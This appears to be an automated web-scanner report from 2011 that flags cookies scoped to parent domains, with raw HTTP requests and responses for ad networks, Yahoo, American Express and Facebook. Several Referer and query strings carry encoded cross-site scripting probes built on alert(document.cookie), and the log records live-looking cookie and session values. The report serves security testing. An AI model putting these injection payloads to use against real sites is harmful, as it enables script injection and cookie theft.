GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 07-May-2011 11:00:06 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 11:00:06 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C_=BlankImage P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 16:00:06 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117121&PluID=0&e=0&w=728&h=90&ord=7582024&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/3/0/%2a/m%3B235470018%3B0-0%3B0%3B23542470%3B3454-728/90%3B40150909/40168696/1%3Bu%3Dzdtopic%3Ditmanagement|zdtopic%3Denterprise|zdtopic%3Dintelligence|zdid%3Da6280|zdtype%3Darticle|zdaudience%3D|zdproduct%3D|zdcompany%3D|zdpagetype%3D%3B%7Eaopt%3D2/0/73/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: buzz.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:46:13 GMT Set-Cookie: B=5u8ndkd6krkpl&b=3&s=t6; expires=Tue, 05-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 124261
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en-US" id="front" class="univHeader pageLang-en-US ie ie7 ie70 winvista"> <head> <title>What's Buzzing? You Tell Us! Top News and ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: buzzport.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
adsud=BLU0YPM; expires=Fri, 06 May 2011 22:25:47 GMT; path=/; domain=.adsummos.net;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a/e/d1.ads?r=55898391&bk_stamp=1&s=2jh81Z&et=6&sid=s21719 HTTP/1.1 Host: c03.adsummos.net Proxy-Connection: keep-alive Referer: http://c03.adsummos.net/a/e/s21719 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adsuu=vmkju57YZhpA
Response
HTTP/1.1 302 Moved Temporarily Server: Apache Content-Length: 153 Content-Type: text/html Location: http://user.lucidmedia.com/clicksense/user/browser?p=d4f5efa344d0146a&i=8eca9d9961eb3197d2c29b6bafa25157&r=0&d= Set-Cookie: adsud=BLU0YPM; expires=Fri, 06 May 2011 22:25:47 GMT; path=/; domain=.adsummos.net; Set-Cookie: adsud9=; expires=Fri, 06 May 2011 22:25:47 GMT; path=/; domain=.adsummos.net; ETag: "238f6d58764549fcc9077580bf048dc0:1296534099" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" Cache-Control: max-age=86400 Date: Sat, 05 Feb 2011 22:25:47 GMT Connection: close Vary: Accept-Encoding
<HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (302 Moved Temporarily) has occured in response to this request. </BODY> </HTML>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
adsuu=vmkju57YZhpA; expires=Thu, 04 Aug 2011 21:53:21 GMT; path=/; domain=.adsummos.net;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a/e/s21719 HTTP/1.1
Host: c03.adsummos.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: adsuu=vmkju57YZhpA; expires=Thu, 04 Aug 2011 21:53:21 GMT; path=/; domain=.adsummos.net;
ETag: "b14d7b7fc278107ef643939a58fa5979:1296529756"
P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA"
P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA"
P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA"
Vary: Accept-Encoding
Cache-Control: max-age=86400
Date: Sat, 05 Feb 2011 21:53:21 GMT
Connection: close
Content-Length: 8049
// <script type="text/javascript"><!-- var ADSUR, ADSUD, adsuTid, handleExeResponse, adsuAdTag, adsuGetSignal;/*
*/ var h=true,n=null,o=false; (function(){function q(a, ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1 Host: cdn.w55c.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /229/go/253329229/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://technet.microsoft.com/en-us/windows/dd641427.aspx?ITPID=allmdia
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296946032-3966638; expires=Monday, 04-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=531E084363024CB3AD7955FF0ECDEFD5; expires=Wednesday, 24-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=f222/39a8; expires=Monday, 04-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=aafc23c/39a8/f197f4d/f222/4d4dd370; expires=Monday, 04-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 05 Feb 2011 22:47:12 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MRT/go/258547606/direct/01/ HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoft.com/windows/enterprise/business-needs-overview.aspx?OCID=1WOD_paid&WT.srch=1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001297008221-9205649; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=AD078C8713444B159EBF588D5E9AEA57; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=12eae/39a8; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=ad483ed/39a8/f691f96/12eae/4d4ec65d; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 06 Feb 2011 16:03:40 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MRT/go/264255445/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://crm.dynamics.com/online?tabid=easy-to-use
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001297008076-9187794; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=F8B2EA3DB6EE4E618E0DC34A30CB08FD; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=903d/33f2; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=b0e4d02/33f2/fc037d5/903d/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 06 Feb 2011 16:01:16 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MRT/go/267859374/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoft.com/en-us/cloud/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001297008076-9187674; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=8F39596F077049028597DA9B186C7374; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=129ed/39a8; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=b32673d/39a8/ff735ae/129ed/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 06 Feb 2011 16:01:16 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/264255445/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://crm.dynamics.com/online?tabid=easy-to-use
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001297008076-9187974; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CD1476F5A3284B4D8A84956285B32A92; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=903d/33f2; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=b0e4d02/33f2/fc037d5/903d/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 06 Feb 2011 16:01:16 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/267859374/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoft.com/en-us/cloud/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001297008076-9188004; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=3E2F68EB98BD48E59A5080FE6FA42FD0; expires=Thursday, 25-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=129ed/39a8; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=b32673d/39a8/ff735ae/129ed/4d4ec5cc; expires=Tuesday, 05-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 06 Feb 2011 16:01:16 GMT
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gcs/cards/ HTTP/1.1
Host: corp.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 21:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-cookie: SaneID=173.193.214.243-25629229680629; path=/; expires=Sat, 05-Feb-16 21:50:31 GMT; domain=.americanexpress.com
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=mzrsjm55ziqng1au1tmzi545; path=/
Cache-Control: public, max-age=90
Expires: Sat, 05 Feb 2011 21:52:01 GMT
Last-Modified: Sat, 05 Feb 2011 21:50:31 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 39860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gcs/cards/land/compare.aspx HTTP/1.1
Host: corp.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 21:50:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-cookie: SaneID=173.193.214.243--17320946710097; path=/; expires=Sat, 05-Feb-16 21:50:33 GMT; domain=.americanexpress.com
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=q0nfjsmlal0n1l45z4jzte55; path=/
Cache-Control: public, max-age=900
Expires: Sat, 05 Feb 2011 22:05:33 GMT
Last-Modified: Sat, 05 Feb 2011 21:50:33 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 40724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gcs/travel/us/ HTTP/1.1
Host: corp.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Length: 191
Content-Type: text/html
Content-Location: http://corp.americanexpress.com/gcs/travel/us/default.htm
Last-Modified: Tue, 25 Nov 2008 02:00:23 GMT
Accept-Ranges: bytes
ETag: "78d8fc93a14ec91:2144"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-cookie: SaneID=173.193.214.243--17320946090159; path=/; expires=Sat, 05-Feb-16 21:50:33 GMT; domain=.americanexpress.com
Date: Sat, 05 Feb 2011 21:50:32 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head> <meta http-equiv="refresh" content="0;url=/gcs/travel/"/> </head> <body></body> </html>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FTID=1DJSvH2tlD0r; path=/; expires=Sun, 05 Feb 2012 21:00:00 GMT; domain=.yadro.ru
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hit?rhttp%3A//burp/show/0;s1920*1200*16;uhttp%3A//driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload72968%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%28document.cookie%29%253Ea36cb148e37;0.6545794615522027 HTTP/1.1
Host: counter.yadro.ru
Proxy-Connection: keep-alive
Referer: http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload72968%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ea36cb148e37
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r/dd/id/L21rdC8zL2NpZC8xNzk2NjkwL3QvMg/cat/267859374-193167493/qry/ HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2402274690891816433
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2402274690891816433; Domain=.mediabrandsww.com; Expires=Fri, 05-Aug-2011 13:22:28 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 06 Feb 2011 13:22:27 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /post HTTP/1.1
Host: del.icio.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Date: Sun, 06 Feb 2011 16:01:16 GMT
Set-Cookie: BX=e3vc5bl6kthec&b=3&s=cu; expires=Tue, 06-Feb-2013 20:00:00 GMT; path=/; domain=.icio.us
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/post
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 162
The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P> <!-- fe01.web.del.ac4.yahoo.net uncompressed/chunked Sun Feb 6 16:01:16 UTC 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/ HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:04:01 GMT
Set-Cookie: B=bgfp9s16kthjh&b=3&s=lg; expires=Tue, 06-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 29605
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/license.html HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:04:01 GMT
Set-Cookie: B=akvfcul6kthjh&b=3&s=mo; expires=Tue, 06-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 22176
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Location: http://developers.facebook.com/docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: datr=HN5NTXcKjZrFIQ37M294VK4z; expires=Mon, 04-Feb-2013 23:32:44 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ScgJn; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:32:44 GMT
Content-Length: 0
